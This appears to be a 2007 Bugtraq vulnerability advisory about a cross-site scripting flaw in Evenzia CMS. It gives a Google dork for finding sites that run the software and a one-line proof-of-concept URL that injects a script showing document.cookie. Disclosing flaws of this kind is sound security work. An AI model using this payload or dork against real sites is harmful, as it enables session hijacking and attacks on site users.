[<prev] [next>] [month] [year] [list]
Date: 1 Jun 2007 16:58:16 -0000
From: glafkos@...osec.org.uk
To: bugtraq@...urityfocus.com
Subject: Evenzia CMS XSS
Application: Evenzia CMS
Vendors Url: http://www.evenzia.com
Bug Type: Cross-Site Script
Exploitation: Remote
Introduction: Evenzia CMS is a web-based CMS system
Google Dork: "Powered By eVenzia CMS" || "Developed By eVenzia"
PoC:
http://www.test.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>
Credits:
Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk
Information Security Uncensored
InfoSEC.org.uk
June 1st, 2007
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux